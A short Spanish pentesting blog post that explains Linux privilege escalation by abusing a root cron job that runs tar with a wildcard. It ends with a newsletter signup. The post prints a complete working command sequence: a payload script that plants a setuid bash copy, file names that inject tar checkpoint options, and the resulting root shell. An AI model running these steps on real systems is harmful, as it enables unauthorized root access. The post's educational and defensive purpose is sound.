~ / blog / pentesting
KALI

Privesc con cron y wildcard

Una tarea programada que corre como root es una mina de escalada.

Primero revisa el crontab del sistema buscando scripts que se ejecuten como root y que tú puedas modificar. Y ojo con el truco del wildcard: si un cron usa tar o chown con un asterisco sobre una carpeta donde tú escribes, puedes crear archivos con nombres especiales que se convierten en opciones del comando, y ejecutar lo que quieras como root.

Revisa cada cron con lupa.

# los comandos

www-data@victim:$ cat /etc/crontabcopiar
* * * * * root cd /opt/backups && tar czf /tmp/b.tgz *
www-data@victim:$ cd /opt/backups && echo 'cp /bin/bash /tmp/r; chmod +s /tmp/r' > x.shcopiar
www-data@victim:$ touch './--checkpoint=1' './--checkpoint-action=exec=sh x.sh'copiar
www-data@victim:$ /tmp/r -pcopiar
r-5.1# id -> euid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.